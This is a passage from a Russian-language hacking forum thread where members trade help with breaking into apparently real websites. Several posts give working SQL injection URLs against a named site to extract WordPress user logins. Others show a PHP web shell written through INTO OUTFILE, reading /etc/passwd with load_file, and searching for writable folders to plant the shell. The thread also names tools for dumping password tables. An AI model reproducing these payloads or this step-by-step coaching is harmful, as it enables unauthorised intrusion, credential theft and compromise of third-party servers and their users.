Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5

    Ок, еще бы про составление запроса проконсультировали бы
     
  2. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Если очень постараться, то можно раскрутить

    5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2

    так что дерзай
     
  3. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    И в подтверждение своих слов ты наверное сейчас всех удивишь и покажешь вектор атаки именно НА ЭТОМ МЕСТЕ, да? :)
     
  4. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:


    Code:
    HTTP/1.1 500 Internal Server Error
    Date: Sat, 10 Mar 2012 09:07:10 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 9201
    
    <html>
        <head>
            <title>Conversione non riuscita durante la conversione del valore nvarchar 'u:[email protected]' nel tipo di dati int.</title>
            <style>
    
    но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема?
     
  5. alexvrn

    alexvrn New Member

    Joined:
    13 Jun 2010
    Messages:
    2
    Likes Received:
    2
    Reputations:
    5
    Можно ли залить шелл на InstantCMS v1.9 ?
     
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    HTTP/1.1 500 Internal Server Error

    Дамперы думают, что ошибка в запросе и не дампить. А самописные дампить должны. Посмотри, нет ли перенаправлений.
     
  7. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Code:
    http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,COLUMN_NAME,3/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=%27wp_users%27/**/LIMIT/**/2,1--
    Так выводит, а так нет...
    Code:
    http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,UNHEX%28HEX%28user_login%29%29,3/**/FROM/**/wp_users%27/**/LIMIT/**/0,1--
    Как вывести?
    P.S: использовать функции ASCII() и CHAR?
     
  8. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    выручайте!
    есть рут доступ к phpmyadmin.
    мне уже один товарищ помог с залитием шелла, спасибо ему за это, но вопрос такой:
    когда я пишу код
    Code:
    SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/dir/name/shell.php'
    где указываю установочный путь, который я узнал из инъекции. и потом мне выдает что я не имею права записи в эту папку. вообще никуда. хотя нужно заметить что доступ рут.
    решил пойти в обход, дал команду SELECT @@datadir которая мне выдала свободную папку /var/lib/mysql/
    туда все спокойно льется, только понять где находится заветный php файл мне не удается.
    Прошу помочь вас разобраться с первым вопросом или со вторым. Мб я что-то не так делаю
     
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    aydin-ka,
    в другой базе твоя таблица.
    Узнаем вот так:
    Code:
    http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT+table_schema+from+information_schema.tables+where+table_name='wp_users'),3--+
    Теперь выводит логин:
    Code:
    http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT user_login from smokycarrotcom1.wp_users limit 0,1),3--+f
    stan0009,
    Из /var/lib/mysql/ не сможешь выполнять скрипты. Ищи папки, типа /uplaods/, /images/, /tmp/ и т.д. и т.п. Там обычно CHMOD 755 or 777.
     
    #19669 Ereee, 10 Mar 2012
    Last edited: 10 Mar 2012
    2 people like this.
  10. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Ereee
    меня вот что удивляет что захожу из под root а пишет что нет доступа(
    в чем прикол понятия не имею.
    Всмысле которые в корне(/tmp/) или которые например в /home/site/dir/tmp/ ?
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    В /home/site/dir/tmp/. У тебя рут-доступ на MYSQL-сервере, полный доступ над целевой системой у тебя нет.
     
  12. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    В другом месте

    _http://forum.auto-most.ru/faq.php?bb=phpinfo();
     
    1 person likes this.
  13. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    https://forum.antichat.ru/threadnav189469-1-10-instant%2Bcms.html
    Правда там до версии 1.6.2
     
  14. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Ereee
    спасибо конечно, но походу все перекрыто(
    есть может еще какие способы?
    версия админки 2.9.1.1
     
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Бывает, но такие случаи занесены в Красную книгу. Поищи еще папок...
     
  16. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Если у тебя русскоязычный сайт и File_priv = Y, то проверь на всякий случай главную страницу на код сапы.

    PHP:
    load_file('полный_путь/index.html')
    Если повезет, то у тебя будет папка с правами 777.

    (Спасибо faza02 за этот интересный выход из положения, когда казалось, что нет папок для заливки шелла :) )
     
  17. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    ^
    ||

    Error in syntax
    видимо дело дрянь
    а стоп.
    команда то наверно не такая
    я то пишу команду load_file прямым текстом а как надо?

    Не очень то вы активные)
    пишите в личку чтоле, чтобы много мне не писать)
    как быть?
    пишу select load_file('/etc/passwd'); отображается BLOB и размер файла.
    других способов не знаю
     
    #19677 stan0009, 10 Mar 2012
    Last edited: 10 Mar 2012
  18. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    заюзал споинт и ты крут,молодчик,иди домой пасси гусей
    спрашиволось а расскрутке,а не через другой способ лол
     
  19. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    подкиньте название какой-нибудь проги для дампа mysql таблицы через schema,SIPT 4 не смог,хотя ручками все ок
     
  20. Metho

    Metho New Member

    Joined:
    18 Nov 2011
    Messages:
    182
    Likes Received:
    2
    Reputations:
    0
    в общем есть таблицы, havij их вроде хавает при get, но не выдает в левой колонке - а там все нужное. как открыть скрытое? :) uname есть ид есть, мейл есть, pass скрыта)
    спасибо.
     
    #19680 Metho, 11 Mar 2012
    Last edited: 11 Mar 2012
Thread Status:
Not open for further replies.